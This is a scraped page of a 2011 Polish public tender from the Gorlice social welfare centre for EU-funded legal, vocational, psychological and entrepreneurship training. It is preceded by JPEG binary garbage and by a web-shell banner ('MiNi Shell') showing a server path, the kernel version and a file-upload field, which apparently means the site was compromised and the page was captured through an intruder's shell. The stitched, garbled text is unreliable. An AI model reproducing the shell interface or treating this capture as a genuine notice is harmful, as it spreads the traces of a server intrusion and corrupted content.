JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110322/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110322/50272-N-2011.html

<p class="kh_header"><b>Gorlice: ZORGANIZOWANIE I PRZEPROWADZENIE SZKOLEŃ 
W ZWIĄZKU Z REALIZACJĄ PRZEZ MIEJSKI OŚRODEK POMOCY SPOŁECZNEJ W GORLICACH PROJEKTU POD NAZWĄ DAJ SOBIE SZANSĘ, TOBIE TEŻ SIĘ UDA WSPÓŁFINANSOWANEGO 
ZE ŚRODKÓW EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO 
W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI</b><br>
<b>Numer ogłoszenia: 50272 - 2011; data zamieszczenia: 22.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Gorlicach , ul. Wąska 5, 38-300 Gorlice, woj. małopolskie, tel. 18 3536429, faks 18 3535642.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.gorlice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZORGANIZOWANIE I PRZEPROWADZENIE SZKOLEŃ 
W ZWIĄZKU Z REALIZACJĄ PRZEZ MIEJSKI OŚRODEK POMOCY SPOŁECZNEJ W GORLICACH PROJEKTU POD NAZWĄ DAJ SOBIE SZANSĘ, TOBIE TEŻ SIĘ UDA WSPÓŁFINANSOWANEGO 
ZE ŚRODKÓW EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO 
W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1. Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu i przeprowadzeniu szkoleń w 2011 r. - jako części zamówienia pn. Zorganizowanie i przeprowadzenie szkoleń w związku z realizacją przez Miejski Ośrodek Pomocy Społecznej w Gorlicach projektu pod nazwą - Daj sobie szansę, Tobie też się uda -  współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.

1.2. Przedmiot zamówienia realizowany będzie przez instytucję szkoleniową posiadającą wpis do Rejestru Instytucji Szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej.

1.3. Celem szkolenia jest aktywna integracja osób zagrożonych wykluczeniem społecznym, zwiększenie kompetencji społecznych i zawodowych, wzmocnienie poczucia wartości i wiary we własne siły.

1.4. Przedmiot zamówienia obejmuje opracowanie autorskich programów zajęć z uwzględnieniem specyfiki grupy docelowej, zorganizowanie i przeprowadzenie szkolenia dla 41 osób (25-55 lat) - klientów Miejskiego Ośrodka Pomocy Społecznej w Gorlicach w następujących modułach tematycznych: doradztwo prawne, trening umiejętności społecznych, doradztwo zawodowe, doradztwo psychologiczne, warsztaty przedsiębiorczości.

1) Doradztwo prawne - I etap szkolenia:
a) Zajęcia powinny obejmować m.in. takie elementy tematyczne jak: podstawowe zagadnienia i informacje prawne z zakresu prawa pracy, cywilnego, rodzinnego, administracyjnego i gospodarczego; porady prawne pomagające uczestnikom szkolenia odnaleźć się na rynku pracy i aktywnie uczestniczyć w życiu publicznym, świadczenie poradnictwa prawnego w zależności od potrzeb uczestników szkolenia. itp.
b) Zajęcia mają charakter grupowy i indywidualny.
Zajęcia grupowe - 4 grupy (3 grupy po 10 osób, 1 grupa - 11 osób).
c) Liczba godzin szkoleniowych grupowych, dla jednej grupy - 14 (1 godzina szkoleniowa - 45 minut). 
Liczba godzin szkoleniowych indywidualnych - 2 (1 godzina szkoleniowa - 45 minut) dla każdego uczestnika szkolenia.
d) Szkolenie - doradztwo prawne należy zrealizować do 25.05.2011 r.
Zajęcia szkoleniowe odbywać się będą od poniedziałku do piątku w dniach pracy zamawiającego.
Zajęcia grupowe: dla każdej grupy szkolenie zostanie przeprowadzone w ciągu dwóch dni w godzinach 8:00 - 15:00. 
W każdym dniu szkolenia grupowego należy zapewnić przerwy kawowe i obiadową.
Zajęcia indywidualne przeprowadzone zostaną dla uczestników danej grupy bezpośrednio po zakończeniu zajęć grupowych tej grupy w ciągu dwóch lub trzech dni w godzinach 8:00 - 18:00, 
e) Wykonawca po przeprowadzeniu niniejszego etapu szkolenia zobowiązany jest do wydania dokumentu o ukończeniu szkolenia z uwzględnieniem zapisu o liczbie godzin szkolenia każdemu uczestnikowi.
f) Wykonawca zapewnia każdemu uczestnikowi szkolenia materiały edukacyjne do wykorzystania podczas zajęć i oddaje je uczestnikom na własność: książka: kodeks pracy, kodeks rodzinny i opiekuńczy.

2) Trening umiejętności społecznych - II etap szkolenia:
a) Zajęcia powinny obejmować m.in. takie elementy tematyczne jak: naukę umiejętności komunikacji 
interpersonalnej, poznawanie własnej osoby, umiejętność zarządzania własną osobą, autoprezentację, radzenie sobie ze stresem, postępowanie w sytuacjach konfliktowych, trening asertywności itp.
b) Zajęcia mają charakter grupowy - 4 grupy (3 grupy po 10 osób, 1 grupa - 11 osób).
c) Liczba godzin szkoleniowych dla jednej grupy - 40 (1 godzina szkoleniowa - 45 minut). 
d) Zajęcia szkoleniowe odbywać się będą od poniedziałku do piątku w dniach pracy zamawiającego w godzinach 8:00 - 15:00. Dla każdej grupy szkolenie zostanie przeprowadzone w ciągu pięciu dni, po 8 godzin szkoleniowych w każdym dniu. 
W każdym dniu szkolenia należy zapewnić przerwy kawowe i obiadową.
e) Wykonawca po przeprowadzeniu niniejszego etapu szkolenia zobowiązany jest do wydania dokumentu o ukończeniu szkolenia z uwzględnieniem zapisu o liczbie godzin szkolenia każdemu uczestnikowi.
f) Wykonawca zapewnia każdemu uczestnikowi szkolenia materiały edukacyjne do wykorzystania podczas zajęć i oddaje je uczestnikom na własność: książka o tematyce - sztuka skutecznego porozumiewania się.

3) Doradztwo zawodowe - III etap szkolenia:
a) Zajęcia powinny obejmować m.in. takie elementy tematyczne jak: zwiększanie motywacji do własnego rozwoju zawodowego, aktywizacja uczestników do poszukiwania pracy, sprawne i elastyczne poruszanie się po rynku pracy, metody poszukiwania pracy, umiejętność sporządzania dokumentów aplikacyjnych itp. 
b) Zajęcia mają charakter grupowy i indywidualny. 
Zajęcia grupowe - 4 grupy (3 grupy po 10 osób, 1 grupa - 11 osób).
c) Liczba godzin szkoleniowych grupowych, dla jednej grupy - 22 (1 godzina szkoleniowa - 45 minut). 
Liczba godzin szkoleniowych indywidualnych - 2 (1 godzina szkoleniowa - 45 minut) dla każdego uczestnika szkolenia.
d) Zajęcia szkoleniowe odbywać się będą od poniedziałku do piątku w dniach pracy zamawiającego. 
Zajęcia grupowe: dla każdej grupy szkolenie zostanie przeprowadzone w ciągu trzech dni w  godzinach 8:00 - 15:00. 
W każdym dniu szkolenia grupowego należy zapewnić przerwy kawowe i obiadową.
Zajęcia indywidualne przeprowadzone zostaną dla uczestników danej grupy bezpośrednio po 
zakończeniu zajęć grupowych tej grupy w ciągu dwóch lub trzech dni w godzinach 8:00 - 18:00. 
e) Wykonawca po przeprowadzeniu niniejszego etapu szkolenia zobowiązany jest do wydania dokumentu o ukończeniu szkolenia z uwzględnieniem zapisu o liczbie godzin szkolenia i karty konsultacji w zakresie doradztwa zawodowego każdemu uczestnikowi.


4) Doradztwo psychologiczne - IV etap szkolenia:
a) Zajęcia powinny obejmować m.in. takie elementy tematyczne jak:  przełamanie bariery zniechęcenia do uczestnictwa w życiu społecznym, przełamywanie bariery lękowej związanej z wejściem na rynek pracy, zwiększenie motywacji do poszukiwania pracy, zwiększenie uczestnictwa w życiu społeczno - zawodowym itp.
b) Zajęcia mają charakter grupowy i indywidualny. 
Zajęcia grupowe - 4 grupy (3 grupy po 10 osób, 1 grupa - 11 osób).
c) Liczba godzin szkoleniowych grupowych, dla jednej grupy - 22 (1 godzina szkoleniowa - 45 minut).  
Liczba godzin szkoleniowych indywidualnych - 2 (1 godzina szkoleniowa - 45 minut) dla każdego uczestnika szkolenia.
d) Zajęcia szkoleniowe odbywać się będą od poniedziałku do piątku w dniach pracy zamawiającego. 
Zajęcia grupowe: dla każdej grupy szkolenie zostanie przeprowadzone w ciągu trzech dni w godzinach 8:00 - 15:00. 
W każdym dniu szkolenia grupowego należy zapewnić przerwy kawowe i obiadową.
Zajęcia indywidualne przeprowadzone zostaną dla uczestników danej grupy bezpośrednio po zakończeniu zajęć grupowych tej grupy w ciągu dwóch lub trzech dni w godzinach 8:00 - 18:00. 
e) Wykonawca po przeprowadzeniu niniejszego etapu szkolenia zobowiązany jest do wydania dokumentu o ukończeniu szkolenia z uwzględnieniem zapisu o liczbie godzin szkolenia i opinii psychologicznej każdemu uczestnikowi.
f) Wykonawca zapewnia każdemu uczestnikowi szkolenia materiały edukacyjne do wykorzystania podczas zajęć i oddaje je uczestnikom na własność: książka o tematyce - psychologia dziecka.

5) Warsztaty przedsiębiorczości - V etap szkolenia:
a) Zajęcia powinny obejmować m.in. takie elementy tematyczne jak: naukę umiejętności racjonalnego  gospodarowania budżetem domowym, kształtowanie umiejętności zaspokajania w pierwszej kolejności podstawowych potrzeb życiowych, podstawy przedsiębiorczości - badanie rynku, podstawy wiedzy niezbędnej do założenia i prowadzenia własnej działalności gospodarczej, marketing, reklama, prezentacja różnych pomysłów na własny biznes, rozliczanie druków PIT, itp.
b) Zajęcia mają charakter grupowy - 4 grupy (3 grupy po 10 osób, 1 grupa - 11 osób).
c) Liczba godzin szkoleniowych dla jednej grupy - 8 (1 godzina szkoleniowa - 45 minut). 
d) Zajęcia szkoleniowe odbywać się będą od poniedziałku do piątku w dniach pracy zamawiającego w godzinach 8:00 - 15:00. Dla każdej grupy szkolenie zostanie przeprowadzone w ciągu jednego dnia. 
W każdym dniu szkolenia należy zapewnić przerwy kawowe i obiadową.
e) Wykonawca po przeprowadzeniu niniejszego etapu szkolenia zobowiązany jest do wydania dokumentu o ukończeniu szkolenia z uwzględnieniem zapisu o liczbie godzin szkolenia każdemu uczestnikowi.
f) Wykonawca zapewnia każdemu uczestnikowi szkolenia materiały edukacyjne do wykorzystania podczas zajęć i oddaje je uczestnikom na własność: książka o tematyce - podstawy przedsiębiorczości.

1.5. Każdej grupie szkoleniowej należy zapewnić ciągłość szkolenia  realizując moduły szkoleniowe określone w  ust. 1.4. pkt 1-4 tzn. po każdym etapie szkolenia danej grupy należy rozpocząć dla tej grupy (bez zbędnych przerw między kolejnymi dniami szkolenia - nie więcej niż 3 dni szkoleniowe przerwy) następny etap szkolenia. Natomiast moduł szkoleniowy określony w  ust. 1.4. pkt 5 Warsztaty przedsiębiorczości należy przeprowadzić w miesiącu lipcu (od 01.07.2011 r. do 15.07.2011 r.)

1.6. Wykonawca zapewnia lokal (salę szkoleniową) w granicach administracyjnych miasta Gorlice z zastrzeżeniem, iż jeżeli wykonawca zapewni lokal w odległości większej niż 2 km od siedziby MOPS w Gorlicach w cenę należy wliczyć również przewóz osób (na szkolenie i z powrotem).

1.7. Szkolenie należy zorganizować w pomieszczeniach i miejscach z zapewnionym zapleczem do przeprowadzenia szkolenia, zgodnie z wymaganiami polskiego prawa, tj. pomieszczenia muszą posiadać odpowiednie warunki sanitarne, bezpieczeństwa, akustyczne i jakościowe oraz muszą być wyposażone 
w niezbędne pomoce dydaktyczne (flipchart, rzutnik multimedialny, ekran).

1.8. Wykonawca zobowiązany jest do ubezpieczenia uczestników szkolenia od następstw nieszczęśliwych wypadków na czas realizacji szkolenia.

1.9. Wykonawca w ramach przedmiotu zamówienia zapewnia każdemu uczestnikowi szkolenia materiały szkoleniowe z każdego modułu szkoleniowego i materiały biurowe (kalkulator, pendrive 2GB, notatnik A4, zeszyt A4 kratka 96 kartkowy w twardej oprawie, długopis, ołówek, gumka do mazania, kolorowe cienkopisy 4 szt, teczka kartonowa z rączką A4, teczka tekturowa z gumką A4 - 5 szt., okładka na dokumenty A4 - 5 szt., segregator wąski A4, skoroszyt A4 plastikowy z możliwością wpięcia do segregatora, koszulki na dokumenty - 10 szt, zakreślacz, marker) do wykorzystania podczas zajęć i oddaje je uczestnikom na własność.

1.10.Wykonawca zobowiązany jest zapewnić uczestnikom szkolenia w każdy dzień szkolenia grupowego serwis kawowy (kawa, herbata, woda, soki, cukier, śmietanka do kawy, kruche ciastka, owoce, drobne przekąski) i gorący posiłek (obiad 2 daniowy z kompotem i deserem przy czy należy zapewnić każdemu uczestnikowi aby minimum co drugi obiad był z daniem mięsnym) z zachowaniem norm sanitarnych oraz BHP. Produkty podawane podczas serwisu kawowego i wykorzystywane do przygotowania gorącego posiłku winny spełniać normy żywieniowe oraz sanitarno-epidemiologiczne.

1.11. Wykonawca zobowiązany będzie do umieszczania w miejscu szkolenia, na materiałach szkoleniowych 
i edukacyjnych, wydanych zaświadczeniach informację: Projekt Daj sobie szansę, Tobie też się uda jest współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki oraz logotypu Program Operacyjny Kapitał Ludzki oraz logo Unii Europejskiej wraz z odniesieniem (podpisem) Europejski Fundusz Społeczny oraz zapis: Człowiek - najlepsza inwestycja.

1.12. Wykonawca zobowiązany jest do sprawowania nadzoru nad frekwencją uczestników szkolenia przez prowadzenie imiennych list obecności, a także bieżącego informowania Zamawiającego o każdej nieobecności osoby skierowanej na szkolenie. Wykonawca zawiadamia zamawiającego o nieobecności w dniu w którym nieobecność nastąpiła.
 
1.13. Wykonawca zobowiązany jest prowadzić na bieżąco dziennik zajęć zawierający głównie daty i godziny przeprowadzonych szkoleń, tematykę zajęć, zgodnie z zaproponowanym programem i harmonogramem szkolenia.

1.14. Osoby szkolące zobowiązane są do wystawienia pisemnej opinii o każdym uczestniku szkolenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia oferty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku należy wykazać co najmniej 2 wykonane należycie usługi polegające na zorganizowaniu i przeprowadzeniu szkolenia, którego zakres tematyczny obejmował doradztwo prawne lub trening umiejętności społecznych lub doradztwo zawodowe lub doradztwo psychologiczne lub warsztaty przedsiębiorczości, z których co najmniej jedna usługa szkoleniowa była współfinansowana ze środków Europejskiego Funduszu Społecznego. Wykonawca dołączy do oferty wykaz wykonanych usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z załączeniem dokumentu potwierdzającego, że usługi zostały wykonane należycie. Na podstawie złożonych dokumentów Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły :  spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku należy wykazać dysponowanie przy realizacji zamówienia następującą kadrą dydaktyczną:
a) osobą posiadającą wykształcenie wyższe, kierunek prawo, która przeprowadziła co najmniej 2 szkolenia lub posiada co najmniej roczne doświadczenie dydaktyczne (prowadzenie wykładów), związane z zagadnieniami prawnymi,
b) osobą posiadającą wykształcenie wyższe, kierunek psychologia lub socjologia, która przeprowadziła co najmniej 2 szkolenia lub posiada co najmniej roczne doświadczenie dydaktyczne (prowadzenie wykładów), związane z tematem: trening umiejętności społecznych,
c) osobą posiadającą wykształcenie wyższe, specjalność: doradztwo zawodowe, która przeprowadziła co najmniej 2 szkolenia lub posiada co najmniej roczne doświadczenie dydaktyczne (prowadzenie wykładów), związane z tematem: doradztwo zawodowe, 
d) osobą posiadającą wykształcenie wyższe, kierunek psychologia, która przeprowadziła co najmniej 2 szkolenia lub posiada co najmniej roczne doświadczenie dydaktyczne (prowadzenie wykładów), związane z tematem: doradztwo psychologiczne,
e) osobą posiadającą wykształcenie wyższe, kierunek ekonomia, która przeprowadziła co najmniej 2 szkolenia lub posiada co najmniej roczne doświadczenie dydaktyczne (prowadzenie wykładów), związane z tematem: warsztaty przedsiębiorczości,
Wykonawca dołączy do oferty wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami. 
Na podstawie złożonych dokumentów Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły :  spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony formularz OFERTA, który należy  sporządzić ściśle wg wzoru formularza stanowiącego zał. nr 2 do SIWZ. Formularz musi być podpisany przez osobę/osoby uprawnione do składania  oświadczeń woli w zakresie praw i obowiązków majątkowych wykonawcy z podaniem ceny za całość przedmiotu zamówienia.
oraz załączniki:
      2.    Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy 
             składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów,
      3.    Przedsiębiorcy występujący jako spółka cywilna zamiast upoważnienia o którym mowa powyżej 
             mogą dołączyć do oferty umowę spółki cywilnej w przypadku gdy umowa spółki jednoznacznie 
             wskazuje na sposób reprezentowania spółki.
      4.    Potwierdzony przez upoważnionego przedstawiciela wykonawcy wzór umowy stanowiący     
      zał. nr 1 do SIWZ,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków tych zmian zawiera wzór umowy stanowiący zał. nr 1 do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
